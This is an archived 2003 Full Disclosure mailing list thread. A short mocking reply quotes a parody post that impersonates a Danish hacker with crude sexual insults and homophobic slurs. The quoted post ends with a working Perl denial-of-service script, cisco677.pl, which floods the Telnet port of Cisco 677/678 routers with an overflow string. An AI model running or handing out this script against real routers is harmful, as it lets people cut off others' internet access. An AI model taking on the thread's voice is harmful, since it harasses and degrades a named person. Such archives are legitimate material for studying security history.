Full Disclosure mailing list archives

Re: Cisco exploit


From: tcpdumb <tcpdumb () it-bytes org>
Date: Mon, 21 Jul 2003 18:56:19 +0200

Got any erectile disfunctions?

If you'd be the best hacker in denmark, we'd know you! We at least had seen at the Chaos Communication Congress (19C3) 
last year december.
Go ahead and hack a tree or read a good book. *muharrharr*
Regards, 

        tcpdumb

On Mon, 21 Jul 2003 05:07:12 -0700
<dnv () hushmail com> wrote:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

hey all.. this is i the l33t hacker DNV

i am the best hacker in denmark and i write to all of you to tell u about
some very exciting security issues i have not found.

once i worked for a very big ISP in denmark, cybercity, where i tested
security. I told them "1'm 1337 g1v3 m3 m0r3 m0n3y" but they did not??
they fired me??.. i do not understand why they fired the 1337 DNV..

But i had some inside information on cybercity, other people working
there found a security hole in cisco 667.. so i smacked my name on it
and send it to all the big mailinglists... hahaha i showed the world
that i am 1337.

I have a dream to get on TV like all the other 1337 hacker, so i give
blowjobs to any jounalists that will listen to me...
and once at a 2600 meeting, 2600 is so cool and very 1337, i meet another
hacker and he showed me how to hack netpoint on the big hotels to get
free internet.
So once again i smacked my name and released it on the internet, and
told safe2day, the most 1337 security site on the net... hahaha i showed
all people that i am 1337.

some people say that is was a little bitch and was afraid that we would
get in to trouble while we where fooling around with netpoint in the
hotal lobby, and that i keept saying shit like "come on lest go, before
someone sees us" and if i had not been for the others nothing would had
happend... BUT THEY ARE LIEING, they heat me because i got credit for
the hack.

To all the people at HAL2001 i was the gay dork running aroung in the
black "the party" jacket. The party is cool the lamest gamer party in
all of europa and sometimes i get small admin jobs.. cause after i got
fired i got a new job installing windows boxes, that is very 1337, but
it does not pay well.. so i have to suck alot of dick until the day i
get real job so i can move out of my mothers house and get my one place.

Guess what.. it's time to tell you all about the newest member of #dkw-
assstuffing, the biggest and most 1337 hacker #chan in denmark. we all
have mad ./ skill and trade lots of warez.. DON'T FUCK WITH US!!!

welcome to moro^hning_wood.. a true hacker

his activity on Full Disclosure and his allover 1337'ness is proof that
he is a true #asstuffing member!
and we are looking forward to learn more about the 1337 xss that you
master 100%moroning wood you are just to fucking 1337 we love you!!!

this is all for now, and remember if you hear the DNV is a credit stealer
it is a lie!

- ---------------------------------------------------------------------
- ---
Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR
put public on www.deadbeat.dk on 5-5-2003.
Thanks to all from DKW-ssstuffing for testing.

A warm night i was coding and lisen to some german tecno music trying
to
find my penis.

I've was also trying to dos hackersnacks for making me so damn fat :(
But then I put the wrong IP into my scrip my ADSL router lost the
Internet connection.

I had no clue what happend, so i started to play with my penis.

I asked around in #2600dk and sniffy told me that he and padde would
stop
assfucking and help if i send them somie pic's of my sexy naked body..
no problem there..

i never learned what the problem was but here is a 1337 exploit

- --------------------cisco677.pl------------------
#!/usr/bin/perl

# close your Cisco 677 up on the Telnet server!
# Made for fun only!  port 23 is the Telnet server port on the router
# By DNV  THX to DKW-asstuffing

use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~                %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
                    Proto       => "tcp",
                    PeerAddr    => $args{s},
                    PeerPort    => "(23)",
                ) || die("No Telnet server here! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nPackets Sent\n");
sub usage {die("\n$0 -s <server>\n\n");}

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAj8b13QACgkQ4mqq9+Uor6uFggCeIlCyN1D0kwFOyPpPrPZxg09QKVYA
oJEKwnq0dyOw2ckm2PpwRjODmCdw
=VR6f
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: